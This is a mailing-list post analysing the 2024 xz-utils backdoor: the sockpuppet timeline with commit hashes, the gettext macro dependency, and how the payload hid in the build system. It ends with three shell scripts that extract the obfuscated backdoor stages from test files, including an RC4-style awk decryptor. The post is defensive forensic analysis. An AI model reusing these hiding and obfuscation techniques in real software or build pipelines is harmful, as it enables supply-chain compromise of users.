Tomas Volf wrote:
On 2024-03-31 14:50:47 -0400, Eric Gallager wrote:
With a reproducible build system, multiple maintainers can "make dist"
and compare the output to cross-check for erroneous / malicious dist
environments.  Multiple signatures should be harder to compromise,
assuming each is independent and generally trustworthy.
This can only work if a package /has/ multiple active maintainers.
Well, other people besides the maintainers can also run `make dist`
and `make distcheck`. My idea was to get end-users in the habit of
running `make distcheck` themselves before installing stuff. And if
that's too much to ask of end users, I'd also point out that there are
multiple kinds of maintainer: besides the upstream maintainer, there
are also usually separate distro maintainers. Even if there's only 1
upstream maintainer, as was the case here, I still think that it would
be good to get distro maintainers in the habit of including `make
distcheck` as part of their own release process, before they accept
updates from upstream.

What would be helpful is if `make dist' would guarantee to produce the same
tarball (bit-to-bit) each time it is run, assuming the tooling is the same
version.  Currently I believe that is not the case (at least due to timestamps).

A "tardiff" tool that ignores timestamps would be a solution to that problem, but not to this backdoor.

Combined with GNU Guix that would allow simple way to verify that `make dist'
was used, and the resulting artifact not tampered with, even without any central
signing.

The Guix "challenge" operation would not have detected this backdoor because *it* *was* *in* *the* *upstream* *release*. The build service works from that release tarball and you build from that same release tarball. GNU Guix ensures an equivalent build environment and your results *will* match---either the backdoor was not inserted or it was inserted in both builds.


The flow of the attack as I understand it was:

(0) (speculation on motivation) The attacker wanted a "Golden Key" to SSH and started looking for ways to backdoor sshd. (1) The attacker starts a sockpuppet campaign and manages to get one of his sockpuppets appointed co-maintainer of xz-utils. (2) [2023-06-27] The sockpuppet merges a pull request believed to be from another sockpuppet in commit ee44863ae88e377a5df10db007ba9bfadde3d314. (3) [2024-02-15] The sockpuppet "updates m4/.gitignore" to add build-to-host.m4 to the list in commit 4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e. (4) [2024-02-23] The sockpuppet adds 5 files to the xz-utils testsuite in commit cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0. (5) [2024-03-08] To cover tracks, the sockpuppet finally adds a test using bad-3-corrupt_lzma2.xz in commit a3a29bbd5d86183fc7eae8f0182dace374e778d8. (6) [2024-03-08] The sockpuppet revises two of those files with a lame excuse in commit a3a29bbd5d86183fc7eae8f0182dace374e778d8.

The quick analysis of the Git history supporting steps 2 - 6 above has turned up another interesting detail: no version of configure.ac actually committed ever used the gl_BUILD_TO_HOST macro. An analysis found on pastebin noted that build-to-host.m4 is a dependency of gettext.m4. Following up finds commit 3adaddd73c8edcceaed059e859bd5262df65fc5a of 2023-02-18 in the GNU gettext repository introduced the use of gl_BUILD_TO_HOST, apparently as part of moving some existing path translation logic to gnulib and generalizing it for use elsewhere. This commit is innocent (it is *extremely* unlikely that Bruno Haible was involved in the backdoor campaign) and also explains why the backdoor was checking for "dnl Convert it to C string syntax." in m4/gettext.m4: that comment was removed in the same commit that switch to using gl_BUILD_TO_HOST. The change to gettext also occurred about a year before the sockpuppet began to take advantage of it.

It almost "feels like" the attacker was waiting for an opportunity to make plausible changes to autoconf macros and finally got one when updating the m4/ files for the 5.6.0 release. Could someone with the release tarballs confirm that m4/gettext.m4 was updated between v5.5.2beta and v5.6.0? I doubt the entire backdoor was developed in the week between those two commits. In fact, the timing around introducing ifuncs suggests to me that the binary blob was at least well into development by mid-2023.

The commit message at step 2 claims that using ifuncs with -fsanitize=address causes segfaults. If this is true generally, the glibc team should probably reconsider whether the abuse potential is worth the benefit of the feature and possibly investigate how the feature was introduced to glibc. If this was an excuse, it provided a clever way to prevent oss-fuzz from finding the backdoor, as disabling ifuncs provides a conveniently hidden flag to disable the backdoor.

While double-checking the above, I stumbled across another very suspicious commit in the repository: commit e446ab7a18abfde18f8d1cf02a914df72b1370e3 by Jia Tan on 2024-02-12 creating a separate "safe" range decoder mode because the next commit removes some bounds checks.

Lastly on this topic, some of the blame for this needs to fall on the systemd maintainers and their "katamari" architecture. There is no good reason for notifications of daemon startup to pull in liblzma, but using libsystemd for that purpose does exactly that, and ended up getting xz-utils targeted as a means of getting to sshd without the OpenSSH maintainers noticing.


I have also done a bit more work and replicated extracting the backdoors from the repository. Here are scripts to extract them:

8<------ unpack-1.sh
#!/bin/sh

# Unpack first stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression.

set -x

tr "\t \-_" " \t_\-" \
 < xz-backdoored/tests/files/bad-3-corrupt_lzma2.xz \
 > backdoor-1.xz
7z l -slt backdoor-1.xz
7z e -y   backdoor-1.xz

# EOF
8<------

8<------ unpack-2a.sh
#!/bin/sh

# Unpack second stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor-1 script.

set -x

extract () (
 set +x # very noisy
 for cycle in {1..16}; do
   (head -c +1024 >/dev/null) && head -c +2048
 done
 (head -c +1024 >/dev/null) && head -c +939
)

7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
   | extract \
   | tail -c +31233 \
   | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
   | tee backdoor-2a.lzma1 \
   | xz -F raw --lzma1 -dc \
   > backdoor-2a

# EOF
8<------

8<------ unpack-2b.sh
#!/bin/sh

# Unpack binary backdoor module from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor scripts.

set -x

extract () (
 set +x # very noisy
 for cycle in {1..16}; do
   (head -c +1024 >/dev/null) && head -c +2048
 done
 (head -c +1024 >/dev/null) && head -c +939
)

7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
 | extract \
 | LC_ALL=C sed "s/\(.\)/\1\n/g" \
 | LC_ALL=C awk '
BEGIN {
   FS="\n"
   RS="\n"
   ORS=""

   m=256

   for (i=0;i<m;i++) {
        t[sprintf("x%c",i)]=i
        c[i]=((i*7)+5)%m
   }
   i=0; j=0

   for (l=0;l<8192;l++) {
        i=(i+1)%m; a=c[i]
        j=(j+a)%m; c[i]=c[j]; c[j]=a
   }
}

{
   v=t["x" (NF<1?RS:$1)]

   i=(i+1)%m; a=c[i]
   j=(j+a)%m; b=c[j]

   c[i]=b; c[j]=a

   k=c[(a+b)%m]

   printf "%c",(v+k)%m
}' \
 | tee backdoor-2b.xz \
 | xz -dc --single-stream \
 | ((head -c +0 >/dev/null 2>&1) && head -c +88664) \
 > backdoor-2b.o

# EOF
8<------

The above scripts assume that the backdoored code has been unpacked into xz-backdoored in the current directory. As you can see by reading them, they fetch the backdoor code from the tests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma files.

The unpack-1 and unpack-2a scripts yield the shell script backdoor code, while the unpack-2b script yields the binary object that was hidden in the repository.

All backdoor-1 does is unpack and execute backdoor-2a.

Emacs makes short work (make the region span the file; C-M-\) of indenting the backdoor-2a code, which makes the control flow clear and helps to explain how this worked. The backdoor-2a script is run twice, once as part of configure (possibly config.status actually), which modifies src/liblzma/Makefile to unpack and run the backdoor-1 script again using am__dist_setup, am__test_dir, and am__strip_prefix variables to hide the commands that unpack and run backdoor-1, and once during make to actually unpack the backdoor. My previous conclusion that an unreasonably observant user might notice make not build the two affected objects is wrong---make builds them first and the backdoor script rebuilds them to include and call the hidden binary object. Also, it seems that config.status somehow gets deleted during the build, since backdoor-2a uses an if/elif/fi sequence to determine whether to alter src/liblzma/Makefile or apply the hidden object. This is odd but does not impede recovering the backdoor artifacts.


-- Jacob


Reply via email to